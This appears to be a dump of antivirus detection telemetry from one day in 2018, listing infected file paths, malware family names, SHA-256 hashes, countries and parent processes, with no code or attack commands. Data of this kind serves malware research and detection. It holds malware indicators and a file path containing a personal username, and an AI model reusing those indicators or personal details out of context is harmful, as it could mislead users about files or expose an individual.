  Row(detection=Row(filename='faixa 07 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 07 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cap3onn.exe', filepath='D:\\c\\LBP1120_WinXP\\CAP3ONN.EXE', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='c66e4b6ec4ea9463378f9a53b333df3a8bd3cd832c64ceb25263a6032586baf1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111845-3587223f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111845-3587223F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zuma&mb.exe', filepath='F:\\MaZiKa2daY.CoM.Top.Zuma.By.IneXaTo\\Zuma&MB.exe', filesize=5312000, name='W32/Sality.AT.#M1.#R1'), hash='73c0214f39025fde2b7a986da191476396bab4375e65541fd9257d9d119e3074', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T20:36:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.733\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.733\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:39:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T07:43:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115707-226f3c03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a6478a3\\AVSCAN-20181101-114551-D907279B\\AVSCAN-20181101-115707-226F3C03', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:57:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updatus.17175618_runasuser.exe', filepath='C:\\ProgramData\\NVIDIA\\Updatus\\Download\\5424\\updatus.17175618_RUNASUSER.exe', filesize=424000, name='W32/Sality.AT.#M1.#R1'), hash='11c354d74467691a2aab9413de32898977302639ea2def28d4745022c8c258eb', metadata=Row(cmdline='--type=gpu-process --no-sandbox --lang=e...-no-sandbox --lang=en-US --log-file=\\"C:\\\\Users\\\\X\\\\AppData\\\\Local\\\\Facebook\\\\Games\\\\debug.log\\" --log-severity=disable --use...e=3-26-2012 --lang=en-US --log-file=\\"C:\\\\Users\\\\WIN7 64bit\\\\AppData\\\\Local\\\\Facebook\\\\Games\\\\debug.log\\" --log-severity=disable --use...latform-channel-handle=1940 \\/prefetch:2', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Facebook\\Games\\Facebook Gameroom Browser.exe', parentsize=43896, timestamp='2018-11-01T13:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000635-7ab94931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-000635-7AB94931', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:06:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:41:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='win32updates.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\WindowsUpdates\\win32updates.exe', filesize=1536000, name='TR/Crypt.TPM.Gen.#M300.#R2864'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T19:09:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cours aishc iième année bonogo.exe', filepath='\\?\\D:\\COURS AISHC IIème année BONOGO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfusstwainentry0416.dll', filepath='C:\\Program Files\\fiScanner\\ScandAll PRO\\PfuSsTwainEntry0416.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='84d14f762fb86749aa3ba633b26f035e2d0a43b556bde23228041b4d966e29d0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:45:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:50:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174602-20a637a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-174602-20A637A8', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:46:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='16a707beeedf797f8ef41d6880f7dc338eaad2f857fe9b950ef1e0fbb9aa37bb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\16A707BEEEDF797F8EF41D6880F7DC338EAAD2F857FE9B950EF1E0FBB9AA37BB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='16a707beeedf797f8ef41d6880f7dc338eaad2f857fe9b950ef1e0fbb9aa37bb', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:19:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000007c1', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp000007c1', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-232119-cf6b01fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5738aa4a\\AVSCAN-20181101-231834-B68A784B\\AVSCAN-20181101-232119-CF6B01FC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:21:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2097325.exe', filepath='C:\\SGE\\Modulos\\Temp\\2097325.exe', filesize=1920000, name='TR/Hesv.rfwaf.#M1.#R1'), hash='39f6946c1a066b1cbde5f405ec3c9b9221fdd5c30ca0fb763d6876c803c1f71c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\SGE\\Atualizador.exe', parentsize=8644832, timestamp='2018-11-01T17:18:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T21:38:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brazilian portuguese.exe', filepath='F:\\New folder\\Corel Draw 12\\Brazilian Portuguese\\Brazilian Portuguese.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\DISKSTATION-TC\\home\\99_BackUps\\Gerold\\Downloads_alt\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/dummy \\\\\\/dummy \\\\\\/script:AF8079CC-7F10-4A54-876B-4E25C198B58C \\\\\\/uuid: AF8079CC-7F10-4A54-876B-4E25C198B58C \\\\\\/task_type:1 \\\\\\/run_mode:14 \\\\\\/process_guid:2AC1109E-57AD-4579-828E-246619A72EE1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Common Files\\Acronis\\TrueImageHome\\TrueImageHomeService.exe', parentsize=19624000, timestamp='2018-11-01T22:56:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190433-eb2ef1a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190433-EB2EF1A5', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093724-ada8ee53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093724-ADA8EE53', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152747-cbf33e59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152747-CBF33E59', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145953-8afe0486', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145953-8AFE0486', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094127-dc2afcdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094127-DC2AFCDD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage 2016-2017.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d.lgs.81-08.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\SICUREZZA NEI LUOGHI DI LAVORO\\d.lgs.81-08.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scilexer.dll', filepath='C:\\Program Files\\Adobe\\Adobe Utilities\\ExtendScript Toolkit 2\\SciLexer.dll', filesize=752000, name='W32/Ramnit.C.#M1.#R1'), hash='a49cbd9baa2a5809d79b819039fdb3ff937e7375823b8e90829dadeb71f81433', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:22:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\p2poyzirs2u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:59:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182320-186de9a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182320-186DE9A8', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095315-63cbf643', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095315-63CBF643', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ggjlwmpb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ggjlWmpB.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newmhg37lwr.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MPXR3XHU\\newMHG37LWR.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b23ba101ba3b8e35eccb14f9f386611276d00f0e02a9a593baad05f4962ca9b5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:35:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:51:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235722-049e48d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235722-049E48D9', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g4ih54betgn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:28:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a3744611a64d28953637522ff028896c1bf3a5bae91d856f514fdd26c121097c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A3744611A64D28953637522FF028896C1BF3A5BAE91D856F514FDD26C121097C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a3744611a64d28953637522ff028896c1bf3a5bae91d856f514fdd26c121097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='potatore.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\POTATORE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='metodo di studio.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\METODO DI STUDIO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chiavetta engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\chiavetta engim.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kms10.exe', filepath='c:\\windows\\kms10\\kms10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline='auto', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T12:18:32Z'), dt=datetime.date(2018, 11, 1)),
